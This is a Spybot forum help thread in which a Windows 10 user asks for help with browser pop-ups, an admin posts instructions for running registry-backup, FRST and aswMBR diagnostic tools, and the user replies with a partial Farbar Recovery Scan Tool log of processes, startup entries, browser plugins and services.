View Full Version : Malware or Spybot Issue
kym.preston
2016-02-29, 09:49
Hi,
I have a Intel Core i5-4670K at 3.40GHz
16GB of ram
Running Windows 10 Home edition (64 bit)
Using Avast Antivirus
Chrome Browser
I am working from the infected computer, i am able to access some pages just fine like hotmail, Spybot website, youtube, but some of my other frequently visited sites all have numerous pop ups now.
I have run a few full system scans using Spybot - Search and Destroy 2.5 and it has found 5 items with very low to marginal danger ratings. I have selected 'Fix Selected' and the green tick appears but the pop ups still seem to persist and after running more full system scans the same 5 problems come up again. I dont know if this information is redundent or too vague but the problem types are, registry change (2 of those), Browser: Cache, Registry Key, and Browser History. The Categories are Tracks (3 of those), and Browser (2 of those).
I can attached screen shots and what ever else that is needed if it helps in diagnosing and solving the problem.
Thanks for any and all help.
--------------------------------
Admin Edit
FAQ: http://forums.spybot.info/showthread.php?t=288
Please back up your registry!
Backup the Registry:
Credit: Dakeyras
Modifying the Registry can create unforeseen problems, so it always wise to create a backup before doing so.
Please download the installer for Registry Backup from here (http://www.bleepingcomputer.com/download/registry-backup/) or here (http://www.tweaking.com/files/setups/tweaking.com_registry_backup_setup.exe) and save to your desktop.
Right-click on tweaking.com_registry_backup_setup.exe and select Run as Administrator >> Follow the prompts for a default installation
Ensure the option Open "Tweaking.com - Registry Backup" When Install Completes is selected >> Next > >> Finish
Once the GUI(graphical user interface) has appeared/loaded:-
http://i280.photobucket.com/albums/kk173/Dakeyras_album2/TCRB-1.jpg
Click on Backup Now >> once the process is complete the below will be displayed in the GUI:-
http://i280.photobucket.com/albums/kk173/Dakeyras_album2/TBRB-2.jpg
Close Tweaking.com - Registry Backup
Note: There will now be a folder at the root of the Hard-Drive named C:\RegBackup, do not delete this as it is the actual backup just created.
A tutorial for Registry Backup explaining the various features be viewed HERE (http://www.malwareremoval.com/forum/viewtopic.php?f=4&t=61325)
``````````````````````````````````````````````````````
Instruction for producing the Farbar Recovery Scan Tool (FRST) and aswMBR logs
Farbar Log
Please download Farbar Recovery Scan Tool (http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/) and save it to your desktop.
Note:
You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
(A simple way to check your system: Start --> Computer (right click) --> Properties
How to determine whether a computer is running a 32-bit version or 64-bit version (http://support.microsoft.com/kb/827218)of the Windows operating system
Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
Please make sure All Users is checked
Do not check
*List BCD
*Drivers MD5
*Shortcut txt
Or your logs will be too long to post.
Press Scan button.
It will produce a log called FRST.txt in the same directory the tool is run from.
Please don't run the Farbar Recovery Scan Tool (FRST.txt) from your "Downloads" folder or from "Temporary Internet Files"
Please copy and paste log into your topic.
The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please attach that along with the FRST.txt into your reply.
aswMBR Log
Important! Please do NOT perform any fix options offered in aswMBR, we just need to see the report.
Please download aswMBR (http://public.avast.com/%7Egmerek/aswMBR.exe) to your desktop.
Double click the aswMBR icon to run it.
If a prompt stating: The computer supports "Virtualization Technology" appears select Yes
Click the Scan button to start scan.
If you are asked to update the Avast Virus database please allow it to do so.
When it finishes, press the Save Log button, save the logfile to your desktop and post its contents in your reply with the Farbar (FRST) log.
kym.preston
2016-02-29, 11:55
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-02-2016
Ran by Kym (administrator) on KYM-PC (29-02-2016 20:46:10)
Running from C:\Users\Kym\Desktop
Loaded Profiles: Kym (Available Profiles: Kym)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AMD) C:\WINDOWS\System32\atiesrxx.exe
(Intel Corporation) C:\WINDOWS\System32\igfxCUIService.exe
(Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation) C:\WINDOWS\System32\mqsvc.exe
(Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
() C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Avast Software) C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\ng\ngservice.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\WINDOWS\System32\igfxEM.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDMedia.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDCountdown.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDClock.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDPOP3.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDRSS.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\cnext.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Angus Johnson) D:\Internode\mum.exe
(Spotify Ltd) C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Razer Inc.) C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
() C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
(Razer, Inc.) C:\Program Files (x86)\Razer\InGameEngine\32bit\RazerIngameEngine.exe
(Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzStats.Manager\rzcefrenderprocess.exe
(Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzSynapse\rzcefrenderprocess.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Adobe Systems Incorporated) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Microsoft Corporation) C:\WINDOWS\System32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\System32\dllhost.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [396688 2015-07-18] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508240 2015-08-05] (Adobe Systems Incorporated)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [14601160 2015-07-02] (Logitech Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-09-15] (Apple Inc.)
HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\cnext.exe [4867784 2015-12-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-26] (Intel Corporation)
HKLM-x32\...\Run: [Logitech G35] => D:\G35.exe
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5515496 2015-07-02] (Avast Software s.r.o.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [591512 2015-11-19] (Razer Inc.)
HKLM-x32\...\Run: [QuickTime Task] => D:\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46952 2011-08-02] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [30568 2011-08-02] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [139776 2014-06-16] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => "D:\LogMeIn\hamachi-2-ui.exe" --auto-start
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595504 2016-01-29] (Oracle Corporation)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4127488 2015-06-16] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Steam] => D:\Steam\steam.exe [3014224 2016-02-05] (Valve Corporation)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [InternodeUsage] => D:\Internode\mum.exe [2242560 2014-12-04] (Angus Johnson)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Spotify Web Helper] => C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2355312 2016-02-19] (Spotify Ltd)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [f.lux] => C:\Users\Kym\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-24] (Flux Software LLC)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2015-07-02] (Avast Software s.r.o.)
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
Startup: C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Open Broadcaster Software (32bit) (2).lnk [2015-08-20]
ShortcutTarget: Open Broadcaster Software (32bit) (2).lnk -> C:\Program Files (x86)\OBS\OBS.exe ()
BootExecute: autocheck autochk * sdnclean64.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM-x32 -> DefaultScope value is missing
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> D:\Microsoft Office 2013\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2015-07-02] (Avast Software s.r.o.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll [2009-02-06] (Zeon Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\ssv.dll [2016-02-25] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2015-07-02] (Avast Software s.r.o.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: No Name -> {c4e7ab80-82fd-49d4-801d-669cc0a2392a} -> No File
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\jp2ssv.dll [2016-02-25] (Oracle Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - D:\Microsoft Office 2013\Office15\MSOSB.DLL [2015-02-17] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
FireFox:
========
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> D:\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2014-04-28] (Adobe Systems)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [No File]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [No File]
FF Plugin-x32: @java.com/DTPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\dtplugin\npDeployJava1.dll [2016-02-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\plugin2\npjp2.dll [2016-02-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-18] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-19] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2014-04-28] (Adobe Systems)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2015-11-18] (Microsoft Corporation)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2015-12-10]
Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.youtube.com/feed/subscriptions","hxxp://imgur.com/","hxxps://www.netflix.com/","hxxp://twitch.tv/"
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\pdf.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll => No File
CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Profile: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (YouTube) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Adblock Plus) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-02-26]
CHR Extension: (Google Search) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-26]
CHR Extension: (Gmail) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2015-07-02]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeActiveFileMonitor11.0; D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-17] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2020056 2016-02-09] (Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-09-02] (Apple Inc.)
S3 AppleChargerSrv; C:\Windows\System32\AppleChargerSrv.exe [31272 2010-04-07] ()
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [343336 2015-07-02] (Avast Software s.r.o.)
R3 AvastVBoxSvc; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [4034896 2015-07-02] (Avast Software)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2014-05-04] () [File not signed]
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [File not signed]
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
